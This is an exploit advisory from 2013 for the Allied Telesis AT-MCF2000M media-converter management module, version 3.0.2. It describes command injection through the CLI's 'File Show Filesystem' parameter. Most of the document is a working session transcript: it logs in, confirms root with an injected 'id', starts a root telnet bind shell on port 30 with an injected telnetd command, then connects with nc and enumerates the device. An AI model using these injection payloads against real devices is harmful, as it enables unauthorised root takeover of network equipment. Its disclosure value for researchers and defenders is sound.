Allied Telesis AT-MCF2000M version 3.0.2 suffers from a local root-level privilege escalation vulnerability.
ff5d7406c17bd8ff7fdbdde80e74244fd325b7101bde127bdef0b679b0c3a63e
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2013-01-02 ]
####################################################################
# [ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access #
####################################################################
#
# Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.
# With the AT-MCF2000M management module, if there is a blade failure,
# insertion or removal, your traffic flow will not be interupted.."
#
# Vendor: http://www.alliedtelesis.com/
# Product: http://www.alliedtelesis.com/p-2265.html
# Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP
#
###################################################################
# Vulnerability:
Logging in system via ssh/telnet, is necessary to using this vulnerability.
After logging in, user has access to client menu(/sbin/AtiCli), without access to the shell.
User-supplied data are not validated properly. In section "File Show Filesystem=system://0/m/",
is possible to inject command with using special characters: "|;&.
Commands are limited to max 25 characters. Chars / are filtered.
For example:
# File Show Filesystem=system://0/m/";echo 11111111111111111111"
File name can be only up to 25 alphanumeric characters.
<>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]
#
# File Show Filesystem=system://0/m/";ls -al /"
<>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002]
Getting root access:
root@debian:~# ssh 10.11.200.2
--------------------------------------------------------------------------------
Allied Telesis Media Converter
AT-MCF2000
--------------------------------------------------------------------------------
Login: manager
Password: *******
Allied Telesis Media Converter - Version 3.0.2
<No System Name>
# ?
COnfiguration - Configuration related commands
DIagnostics - Diagnostics related commands
File - File related commands
IP - IP related commands
Logging - Logging related commands
Ntp - Ntp related commands
Ping - Ping a host
System - System related commands
Telnet - Telnet related commands
SNMP - Snmp related commands
SSh - SSH related commands
User - User management commands
CLear - Clear the terminal screen
Help - CLI help information
EXit - Exit
# File Show Filesystem=system://0/m/
Module 0/M File System:
-rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg
-rw-r--r-- 1 0 0 2612 Jan 1 15:27 BM_0_2.cfg
-rw-r--r-- 1 0 0 1355 Jan 1 15:27 MM.cfg
-rw-r--r-- 1 0 0 310 Dec 31 13:17 file.inf
-rw-r--r-- 1 0 0 6609 Jan 1 15:27 mcf_chassis0.cfg
# File Show Filesystem=system://0/m/BM_0_1.cfg
Module 0/M File System:
-rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg
# File Show Filesystem=system://0/m/test
Module 0/M File System:
ls: test: No such file or directory
<>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]
# File Show Filesystem=system://0/m/|id
Module 0/M File System:
uid=0 gid=0
# File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"
Module 0/M File System:
<>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061]
# File Show Filesystem=system://0/m/|"ps aux|grep telnet"
Module 0/M File System:
25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli
497 0 192 S telnetd -l/bin/sh -p30
<>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117]
# exit
<>19:01:40::exit::COMPL::[00.001]
#
logging out.
Connection to 10.11.200.2 closed.
root@debian:~# nc 10.11.200.2 30
BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ # id
uid=0 gid=0
/ # uname -a
Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown
/ # cat /proc/version
Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009
/ # ls -al
drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 .
drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 ..
-rw-r--r-- 1 0 0 125 Jan 1 19:10 .ash_history
-rw-r--r-- 1 0 0 0 Jan 1 13:24 1
drwxr-xr-x 2 0 0 1024 Aug 10 2009 bin
drwxr-xr-x 3 0 0 0 Jan 1 15:27 cfg
drwxr-xr-x 4 0 0 2048 Aug 10 2009 dev
drwxr-xr-x 10 0 0 1024 Jan 1 1970 etc
drwxr-xr-x 4 0 0 1024 Aug 10 2009 lib
drwxr-xr-x 2 0 0 12288 Aug 10 2009 lost+found
drwxr-xr-x 3 0 0 1024 Aug 10 2009 mnt
dr-xr-xr-x 49 0 0 0 Jan 1 1970 proc
drwx------ 2 0 0 1024 Aug 10 2009 root
drwxr-xr-x 2 0 0 1024 Aug 10 2009 sbin
drwxrwxrwt 2 0 0 1024 Jan 1 19:06 tmp
drwxr-xr-x 6 0 0 1024 Aug 10 2009 usr
drwxr-xr-x 7 0 0 1024 Jan 1 1970 var
/ # echo pwnd! :) & exit
pwnd! :)
Connection closed by foreign host.
root@debian:~#